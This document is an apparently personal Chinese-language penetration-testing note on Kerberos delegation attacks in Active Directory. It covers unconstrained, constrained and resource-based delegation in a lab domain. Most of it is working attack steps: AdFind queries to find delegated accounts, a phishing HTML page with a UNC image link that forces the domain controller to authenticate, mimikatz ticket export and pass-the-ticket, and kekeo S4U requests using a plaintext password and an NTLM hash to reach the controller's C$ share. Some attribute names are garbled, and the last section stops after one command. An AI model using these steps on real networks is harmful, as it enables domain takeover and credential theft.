委派攻击

约束委派：首先判断委派的第二个设置，然后看针对用户，后续钓鱼配合 非约束委派：首先判断委派的第三个设置，然后看针对用户，主动攻击 资源约束委派：只看DC是不是2012及以上帮版本，然后看针对用户，主动攻击

委派攻击

域委派是什么？
是将域用户A的权限委派给服务账号B,委派之后，服务账号B就可以以域用户A的身份去做域用户能够做的事
注意：能够被委派的用户只能是服务账号或者机器账号
1.机器账户：活动目录中的computers组内的计算机，也被称为机器账号。
2.服务账号：域内用户的一种类型，是服务器运行服务时所用的账号，将服务运行起来加入域内，比如：SQLServer,MYSQL等，还有就是域用户通过上册SPN也能成为服务账号。
服务账号(Service Account),域内用户的一种类型，服务器运行服务时所用的账号，将服务运行起来并加入域。就比如SQL Server在安装时，会在域内自动注册服务账号SqlServiceAccount,这类账号不能用于交互式登录。

非约束性委派

=>需要钓鱼 (域控机访问沦陷机器 =>将 票据带给它)

原理:
机器A(域控)访问具有非约束委派权限的机器B的服务，会把当前认证用户（域管用户）的的TGT放在ST票据中，一起发
送给机器B,机器B会把TGT存储在lsss进程中以备下次重用。从而机器B就能使用这个TGT模拟认证用户（域管用户）访
问服务。

环境搭建

域控=>服务器管理器=>找到域=>(给computers和users上的服务器和用户名给上选项第二个委派) webserver/webadmin
cmd ====> setspn -U -A priv/test webadmin // 刷新配置

利用

Adfind
查询域内设置了非约束委派的--服务账户：
AdFind.exe -h 192.168.3.21 -b "DC=god,DC=org" -f "(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=524288))" dn

查询域内设置了非约束委派的--机器账户:
AdFind.exe -h 192.168.3.21 -b "DC=god,DC=org" -f "(&(samAccountType=805306369)(userAccountControl:1.2.840.113556.1.4.803:=524288))" dn

域控机:
域控主机主动运行命令:
net use  \\webserver
或者域控主机
点击了钓鱼链接http://192.168.3.31/31.html
<!DOCTYPE htm1>
<htmI>
<head>
<title></title>
</head>
<body>
< img src="file:///\\192.168.3.31\2"></body></html>


导出票据到本地
mimikatz sekurlsa::tickets /export

导入票据到内存 票据名为上方命令查询	administrator的
mimikatz kerberos::ptt [0;16a972]-2-0-60a00000-Administrator@krbtgt-GOD.ORG.kirbi

连接通讯域控
dir \\owa2010cn-god\c$

约束性委派

03年引入 只能访问指定机器的指定服务

环境搭建

域控=>服务器管理器=>找到域=>(给computers和users上的服务器和用户名给上委派(选择域控机器=>cifs服务)) 
cmd ====> setspn -U -A priv/test webadmin // 刷新配置

利用

webserver操作:
查询是否配置委派			Adfind
查询机器用户（主机）配置约束委派
AdFind.exe -h 192.168.3.21 -b "DC=god,DC=org" -f "(&(samAccountType=805306369)(msds-allowedtodelegateto=*))" msds-allowedtodelegateto
查询服务账户（主机）配置约束委派
AdFind.exe -h 192.168.3.21 -b "DC=god,DC=org" -f "(&(samAccountType=805306368)(msds-allowedtodelegateto=*))" msds-allowedtodelegateto

1、获取用户的票据（图：获取到票据）			keke烂土豆				
(使用账号/密码)
kekeo.exe "tgt::ask /user:webadmin /password::admin!@#45 /domain:GOD.ORG  /ticket:administrator.kirbi" "exit"
				---密码不行就试试哈希的
(使用账号/哈希)
kekeo.exe "tgt::ask /user:webadmin /domain:god.org /NTLM:518b98ad4178a53695dc997aa02d455c /ticket:administrator.kirbi" "exit"

2.利用用户票据获取域控票据 tgt为上一步获取的票据名称
kekeo.exe "tgs::s4u /tgt:TGT_webadmin@GOD.ORG_krbtgt~god.org@GOD.ORG.kirbi /user:Administrator@god.org /service:cifs/owa2010cn-god.god.org" "exit"

3.导入票据到内存	mimikatz  ptt为cifs服务的票据
mimikatz kerberos::ptt TGS_Administrator@god.org@GOD.ORG_cifs~owa2010cn-god.god.org@GOD.ORG.kirbi

shell dir \\owa2010cn-god.god.org\c$

基于资源的约束性委派

12年以上 且 两台机器账号一致,一台机器拿到高权限可移动到另一台(一个用户加入了两台机器) 存在域内成员用户加入域操作

横向移动 =>到不了域控 RBCD

基于资源的约束委派(RBCD)是在Windows Server2012中新加入的功能，与传统的约束委派相比，它不再需要域管理员权限去设置相关属性。RBCD把设置委派的权限赋予了机器自身，既机器自己可以决定谁可以被委派来控制我。也就是说机器自身可以直接在自己账户上配置msDS-A11 owedToActonBeha1 fofotherIdentity属性来设置RBCD。

利用

AdFind工具获取信息
AdFind.exe -h 192.168.8.11 -b "DC=redteam,DC=test" -f "objectClass=computer" mS-DS-CreatorSID